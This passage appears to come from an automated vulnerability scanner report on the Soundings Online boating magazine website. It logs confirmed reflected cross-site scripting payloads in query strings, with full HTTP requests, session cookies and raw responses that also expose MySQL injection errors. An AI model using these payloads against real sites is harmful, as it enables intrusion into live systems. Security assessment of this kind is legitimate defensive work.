<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsl..
- /component/content/article/272312/272312

/component/content/article/272312/272312 CONFIRMED

http://www.soundingsonline.com/component/content/article/272312/272312?'%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023E8)</script>

Request

GET /component/content/article/272312/272312?'"--></style></script><script>netsparker(0x0023E8)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E8)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E8)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/article/272312/272312" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
emissions
Mark Hayhoe
Campion Marine
" /> <meta name="title" content="In tune with nature" /> <meta name="author" content="Dieter Loibner" /> <meta name="description" content="Mark Hayhoe feels at peace producing fewer emissions courtesy of his revolutionary Campion Allante 645." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>In tune with nature</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_type_of_boat m_uncategorized"><!--
Type of page: article<br />Section: 5, s_features<br />Category: 43, c_type_of_boat<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span></a></li><li class="item232"><a href="http://www.barker..
- /index.php/subscription-services

/index.php/subscription-services CONFIRMED

http://www.soundingsonline.com/index.php/subscription-services?'%22--%3E%3C/style%3E%3C/script%3E%3C..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023E9)</script>

Request

GET /index.php/subscription-services?'"--></style></script><script>netsparker(0x0023E9)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E9)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E9)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/index.php/subscription-services" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Subscription Information for Soundings Magazine</title> <link href="/subscription-services?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/subscription-services?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_sub_services"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: 68, m_sub_services-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

